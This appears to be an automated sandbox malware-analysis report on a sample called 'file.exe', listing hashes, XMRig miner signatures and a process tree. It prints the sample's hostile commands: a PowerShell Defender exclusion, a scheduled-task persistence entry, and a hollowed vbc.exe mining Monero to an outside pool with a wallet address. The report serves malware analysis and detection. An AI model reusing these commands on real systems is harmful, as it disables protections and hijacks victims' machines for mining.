Analysis
-
max time kernel
92s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 17:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.3MB
-
MD5
63a5a9ecfd59f81c8c2744f54809c7f8
-
SHA1
fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
-
SHA256
a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
-
SHA512
9356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
SSDEEP
24576:WdcgTewpeuCLZQ5wrS7j5G1bDD6egAmkI:WdcgT1pehZQYYKTX
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1552-183-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1552-184-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1552-185-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1552-186-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1552-188-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1552-193-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 1496 OWT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OWT.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation OWT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 1496 set thread context of 1552 1496 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2700 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exepid process 4848 file.exe 4848 file.exe 4820 powershell.exe 4820 powershell.exe 1496 OWT.exe 1496 OWT.exe 4376 powershell.exe 4376 powershell.exe 1496 OWT.exe 1496 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 4848 file.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 1496 OWT.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeLockMemoryPrivilege 1552 vbc.exe Token: SeLockMemoryPrivilege 1552 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1552 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 4848 wrote to memory of 4820 4848 file.exe powershell.exe PID 4848 wrote to memory of 4820 4848 file.exe powershell.exe PID 4848 wrote to memory of 5012 4848 file.exe cmd.exe PID 4848 wrote to memory of 5012 4848 file.exe cmd.exe PID 5012 wrote to memory of 2700 5012 cmd.exe timeout.exe PID 5012 wrote to memory of 2700 5012 cmd.exe timeout.exe PID 5012 wrote to memory of 1496 5012 cmd.exe OWT.exe PID 5012 wrote to memory of 1496 5012 cmd.exe OWT.exe PID 1496 wrote to memory of 4376 1496 OWT.exe powershell.exe PID 1496 wrote to memory of 4376 1496 OWT.exe powershell.exe PID 1496 wrote to memory of 100 1496 OWT.exe cmd.exe PID 1496 wrote to memory of 100 1496 OWT.exe cmd.exe PID 100 wrote to memory of 4228 100 cmd.exe schtasks.exe PID 100 wrote to memory of 4228 100 cmd.exe schtasks.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe PID 1496 wrote to memory of 1552 1496 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCFA9.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2700 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:4228 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1552
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD563a5a9ecfd59f81c8c2744f54809c7f8
SHA1fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA5129356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
Filesize
1.3MB
MD563a5a9ecfd59f81c8c2744f54809c7f8
SHA1fc9fa3765ac64a6c8a8607f3447d47151acbe7c4
SHA256a07d160c21ffe45dfdcc0e0b1a485293063b9b1751f635b989fa41075019290a
SHA5129356cfc34a4cf8736cbc6962be63527376590f96e04c91154071e5617e0876bb9aa04b0e7c5dde1d12e3b88d36b6150bfeaf8a2f09e0507e089b90ceb68b1071
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
138B
MD54b5759dff23fd6e13d2a1c3deed3132c
SHA1d0bc23691f37f2ca909310c8d4b5a9a5200f6a01
SHA256583bbc27e9392486c2c028b84fbe2f7e53f83299baebf4155612a702b3666bba
SHA512c7d7bafc52b4b29ce2f64889cd0a84ee1f4c5463986c88b2763e71c667d3ed5cb4337117fc8b4442298b0bb17d28d6d5682dbce88619779511f6de10fed05417